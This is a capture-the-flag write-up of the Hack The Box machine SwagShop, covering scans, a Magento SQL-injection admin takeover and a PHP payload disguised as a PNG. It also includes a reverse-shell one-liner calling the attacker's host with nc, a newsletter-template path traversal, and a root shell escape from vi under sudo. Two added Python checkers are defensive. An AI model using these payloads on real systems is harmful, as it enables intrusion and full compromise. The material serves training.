SwagShop-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: using the magescan tool, Magento-Shoplift-SQLI, OSVDB-126445, getting a shell through a Magento admin template upload, privilege escalation via a misconfigured sudo rule for vi

Reference: https://0xdf.gitlab.io/2019/09/28/htb-swagshop.html

Reference: https://0xrick.github.io/hack-the-box/swagshop/

0x01 Getting user access

1. Get the target IP address: 10.10.10.140

2. Port scan

```
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sC -sV -p- --min-rate 500 10.10.10.140
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-07 15:01 CST
Nmap scan report for 10.10.10.140
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.28 seconds
```

3. Add the host to the local hosts file

```
┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.140 swagshop.htb" | sudo tee -a /etc/hosts
10.10.10.140 swagshop.htb
```

4. Directory scan; it is advisable to run more than one directory scanner, since each wordlist finds different paths

```
┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.10.140 -x php --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/app                  (Status: 301) [Size: 310] [--> http://10.10.10.140/app/]
/api.php              (Status: 200) [Size: 37]
/cron.php             (Status: 200) [Size: 0]
/errors               (Status: 301) [Size: 313] [--> http://10.10.10.140/errors/]
/favicon.ico          (Status: 200) [Size: 1150]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.140/includes/]
/index.php            (Status: 302) [Size: 0] [--> http://swagshop.htb/]
/index.php            (Status: 302) [Size: 0] [--> http://swagshop.htb/]
/install.php          (Status: 200) [Size: 44]
/js                   (Status: 301) [Size: 309] [--> http://10.10.10.140/js/]
/lib                  (Status: 301) [Size: 310] [--> http://10.10.10.140/lib/]
/media                (Status: 301) [Size: 312] [--> http://10.10.10.140/media/]
/pkginfo              (Status: 301) [Size: 314] [--> http://10.10.10.140/pkginfo/]
Progress: 6862 / 9230 (74.34%)[ERROR] Get "http://10.10.10.140/readme": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/server-status        (Status: 403) [Size: 277]
/shell                (Status: 301) [Size: 312] [--> http://10.10.10.140/shell/]
/skin                 (Status: 301) [Size: 311] [--> http://10.10.10.140/skin/]
/var                  (Status: 301) [Size: 310] [--> http://10.10.10.140/var/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://swagshop.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_swagshop.htb/__23-12-07_15-20-19.txt

Target: http://swagshop.htb/

[15:20:19] Starting:
[15:20:27] 301 -  309B  - /js  ->  http://swagshop.htb/js/
[15:20:32] 403 -  277B  - /.ht_wsr.txt
[15:20:32] 403 -  277B  - /.htaccess.bak1
[15:20:32] 403 -  277B  - /.htaccess.orig
[15:20:33] 403 -  277B  - /.htaccess.sample
[15:20:33] 403 -  277B  - /.htaccess.save
[15:20:33] 403 -  277B  - /.htaccess_extra
[15:20:33] 403 -  277B  - /.htaccess_orig
[15:20:33] 403 -  277B  - /.htaccess_sc
[15:20:33] 403 -  277B  - /.htaccessBAK
[15:20:33] 403 -  277B  - /.htaccessOLD
[15:20:33] 403 -  277B  - /.htaccessOLD2
[15:20:33] 403 -  277B  - /.html
[15:20:33] 403 -  277B  - /.htm
[15:20:33] 403 -  277B  - /.htpasswd_test
[15:20:33] 403 -  277B  - /.htpasswds
[15:20:33] 403 -  277B  - /.httr-oauth
[15:20:36] 403 -  277B  - /.php
[15:20:37] 403 -  277B  - /.php3
[15:21:15] 200 -   37B  - /api.php
[15:21:15] 301 -  310B  - /app  ->  http://swagshop.htb/app/
[15:21:15] 200 -  525B  - /app/
[15:21:16] 200 -    1KB - /app/etc/config.xml
[15:21:16] 200 -  895B  - /app/etc/local.xml.template
[15:21:16] 200 -  998B  - /app/etc/local.xml
[15:21:16] 200 -    3KB - /app/etc/local.xml.additional
[15:21:33] 200 -  717B  - /cron.sh
[15:21:33] 200 -    0B  - /cron.php
[15:21:42] 301 -  313B  - /errors  ->  http://swagshop.htb/errors/
[15:21:42] 200 -  574B  - /errors/
[15:21:44] 200 -    1KB - /favicon.ico
[15:21:47] 404 -    0B  - /get.php
[15:21:53] 200 -  458B  - /includes/
[15:21:53] 301 -  315B  - /includes  ->  http://swagshop.htb/includes/
[15:21:55] 200 -   44B  - /install.php
[15:21:55] 404 -   14KB - /index.php/login/
[15:21:56] 200 -   44B  - /install.php?profile=default
[15:21:58] 200 -  701B  - /js/tiny_mce/
[15:21:58] 301 -  318B  - /js/tiny_mce  ->  http://swagshop.htb/js/tiny_mce/
[15:21:58] 404 -   52B  - /js/
[15:22:00] 200 -  554B  - /lib/
[15:22:00] 301 -  310B  - /lib  ->  http://swagshop.htb/lib/
[15:22:01] 200 -    4KB - /LICENSE.txt
[15:22:07] 301 -  312B  - /media  ->  http://swagshop.htb/media/
[15:22:07] 200 -  529B  - /media/
[15:22:19] 200 -  886B  - /php.ini.sample
[15:22:24] 301 -  314B  - /pkginfo  ->  http://swagshop.htb/pkginfo/
[15:22:34] 403 -  277B  - /server-status
[15:22:34] 403 -  277B  - /server-status/
[15:22:35] 200 -  571KB - /RELEASE_NOTES.txt
[15:22:36] 200 -  504B  - /shell/
[15:22:36] 301 -  312B  - /shell  ->  http://swagshop.htb/shell/
[15:22:39] 301 -  311B  - /skin  ->  http://swagshop.htb/skin/
[15:22:54] 301 -  310B  - /var  ->  http://swagshop.htb/var/
[15:22:54] 200 -  409B  - /var/backups/
[15:22:54] 200 -  580B  - /var/
[15:22:54] 200 -  571B  - /var/cache/
[15:22:54] 200 -    1KB - /var/package/

Task Completed
```

5. Use magescan.phar to gather some information about the site (the tool fingerprints the Magento edition and version range)

```
┌──(kali㉿kali)-[~/桌面/htb-tools]
└─$ php magescan.phar scan:all swagshop.htb
Scanning http://swagshop.htb/...

Magento Information

+-----------+------------------+
| Parameter | Value            |
+-----------+------------------+
| Edition   | Community        |
| Version   | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+
```

6. A Google search turned up an exploit. I had been misled about the version number by a document found during the directory scan, but the result still worked.

https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py

7. Successfully obtained an account with administrator privileges

```
┌──(kali㉿kali)-[~/桌面]
└─$ python2 1.py http://swagshop.htb/
WORKED
Check http://swagshop.htb/admin with creds ypwq:123
```

8. A note here: the official walkthrough escalates through the Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution vulnerability, but when I ran it I did not manage to get a shell

```
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit magento 1.7.0.2
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Magento < 2.0.6 - Arbitrary Unserialize /  | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Rem | php/webapps/37811.py
------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m 37811
  Exploit: Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37811
     Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
    Codes: OSVDB-126445
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/37811.py

┌──(kali㉿kali)-[~/桌面]
└─$ curl -s 10.10.10.140/app/etc/local.xml | grep date
            <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>

# Config.
username = 'ypwq'
password = '123'
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

┌──(kali㉿kali)-[~/桌面]
└─$ python2 37811.py 'http://10.10.10.140/index.php/admin' "uname -a"
Traceback (most recent call last):
  File "37811.py", line 55, in <module>
    br['login[username]'] = username
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_mechanize.py", line 809, in __setitem__
    self.form[name] = val
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 1963, in __setitem__
    control = self.find_control(name)
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 2355, in find_control
    return self._find_control(name, type, kind, id, label, predicate, nr)
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 2446, in _find_control
    description)
mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'
```

9. I tried all sorts of changes to the admin path here but still could not get a shell, so, following other articles, I changed strategy and got access through a method I really do not like.

10. Go to the admin backend: http://swagshop.htb/index.php/admin/index/index/

Credentials: ypwq:123

11. Allow symlinks in the template settings: System -> Configuration -> Advanced -> Developer -> Template Settings -> Allow Symlinks: Yes

12. Locally create a file named like a PNG image whose content is PHP that spawns a reverse shell

```
┌──(kali㉿kali)-[~/桌面]
└─$ echo '<?php' >> shell.php.png
┌──(kali㉿kali)-[~/桌面]
└─$ echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 10086 >/tmp/f");' >> shell.php.png
┌──(kali㉿kali)-[~/桌面]
└─$ echo '?>' >> shell.php.png
```

13. Upload the image as a category thumbnail: Catalog -> Manage Categories, configure as shown in the screenshot, upload the shell image, then click Save

14. Create a newsletter template that loads that file: Newsletter -> Newsletter Templates -> Add New Template, and set the template path in the content

```
{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}
```

15. Start a listener, then preview the template just created to receive the reverse shell; this yields the first flag, user.txt

```
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.140] 55206
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html
$ ls
LICENSE.html
LICENSE.txt
LICENSE_AFL.txt
RELEASE_NOTES.txt
api.php
app
cron.php
cron.sh
errors
favicon.ico
get.php
includes
index.php
index.php.sample
install.php
js
lib
mage
media
php.ini.sample
pkginfo
shell
skin
var
$ ls la /home
ls: cannot access 'la': No such file or directory
/home:
haris
$ ls -la /home/
total 12
drwxr-xr-x  3 root  root  4096 Nov 12  2021 .
drwxr-xr-x 23 root  root  4096 Oct 13 13:03 ..
drwxr-xr-x  4 haris haris 4096 Oct 16 07:32 haris
$ cat /home/haris/user.txt
a6d11617ad66133747dd3bd31e6476de
$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@swagshop:/var/www/html$
```
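Two weaknesses are chained in steps 12 to 14: an upload handler that accepts a PHP payload because the file is named like a PNG, and a template resolver that lets a path walk out of the theme directory (the "Allow Symlinks" switch). The following Python shows the checks a defender would put in front of both. It is an added example, not code from this page or from Magento; the template root path, the rejected extension list and the sample files are constructed assumptions.

```python
import os
import re

# Constructed samples: the page's disguised upload is plain PHP with a .png name,
# while a genuine PNG starts with the 8-byte PNG signature.
FAKE_PNG = b"<?php\npassthru(\"id\");\n?>\n"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
EXEC_INNER = {"php", "phtml", "phar", "php5"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> list:
    """Return the reasons an 'image' upload must be rejected (empty list = accept)."""
    reasons = []
    parts = os.path.basename(filename).lower().split(".")
    # shell.php.png: an inner extension some servers still hand to the PHP engine.
    if any(p in EXEC_INNER for p in parts[1:-1]):
        reasons.append("executable inner extension")
    if "." + parts[-1] not in ALLOWED_EXT:
        reasons.append("extension not allowed")
    # Trust the content, not the name: a .png must carry the PNG signature.
    if parts[-1] == "png" and not data.startswith(PNG_MAGIC):
        reasons.append("PNG magic bytes missing")
    if PHP_TAG.search(data):
        reasons.append("PHP open tag in content")
    return reasons


# Assumed theme directory; real Magento resolves relative to the active theme.
TEMPLATE_ROOT = "/var/www/html/app/design/frontend"


def template_path_allowed(template: str, root: str = TEMPLATE_ROOT) -> bool:
    """Reject template references that normalise to a location outside root."""
    resolved = os.path.normpath(os.path.join(root, template))
    return resolved == root or resolved.startswith(root + os.sep)
```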

0x02 Getting root access

16. Checking sudo -l shows a direct path to privilege escalation

```
www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/../../../root/root.txt
<do /usr/bin/vi /var/www/html/../../../root/root.txt

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
^[:qf77f5ee41637342aac0ceb4ca809
~
~
~
www-data@swagshop:/var/www/html$

sudo /usr/bin/vi /var/www/html/a

:set shell=/bin/sh
:shell

www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/a
sudo /usr/bin/vi /var/www/html/a

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
:shell shell=/bin/sh
~
~
~
:shell
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /roo/root.txt
cd /roo/root.txt
/bin/sh: 2: cd: can't cd to /roo/root.txt
# cat /root/root.txt
cat /root/root.txt
00edf77f5ee41637342aac0ceb4ca809
#
```
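Why the rule above is fatal: sudo matches command arguments with shell-style wildcards, and in argument position `*` also matches `/`, so `/var/www/html/*` accepts a path that walks back up to /root; on top of that vi can run `:shell`. The following Python audit is an added example, not code from this page or from sudo, run over a constructed copy of the `sudo -l` output; the list of shell-escaping binaries is an illustrative assumption, not a complete one.

```python
import fnmatch
import os
import re

# Constructed `sudo -l` output modelled on the box, plus one harmless rule for contrast.
SUDO_L_OUTPUT = """\
User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# Assumption: an illustrative subset of binaries that can spawn a shell when run as root.
SHELL_ESCAPE_BINS = {"vi", "vim", "view", "less", "more", "nano", "man", "find", "awk"}

# "(runas) [TAG: ...] /path/to/cmd [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)


def audit_sudo_rules(text: str) -> list:
    """Return (command, finding) pairs for rules that grant more than they appear to."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd, args = m.group("cmd"), m.group("args") or ""
        if os.path.basename(cmd) in SHELL_ESCAPE_BINS:
            findings.append((cmd, "binary can spawn a shell (e.g. :shell in vi)"))
        if "*" in args:
            findings.append((cmd, "wildcard argument: '*' also matches '/', so ../ leaves the directory"))
    return findings


def wildcard_allows(pattern: str, requested: str) -> bool:
    """sudo compares arguments with fnmatch-style globbing where '*' is not stopped by '/'."""
    return fnmatch.fnmatchcase(requested, pattern)


def escapes_directory(allowed_dir: str, requested: str) -> bool:
    """True when the argument normalises to a file outside the directory the rule meant."""
    real = os.path.normpath(requested)
    return not real.startswith(allowed_dir.rstrip("/") + "/")
```

A safer rule for this use case avoids both findings: no wildcard, an explicit file list, and `sudoedit` instead of a full-featured editor.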

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/188


Source: https://sh1yan.top/2023/12/07/SwagShop-htb-writeup/
Author: shiyan
Published: 2023-12-07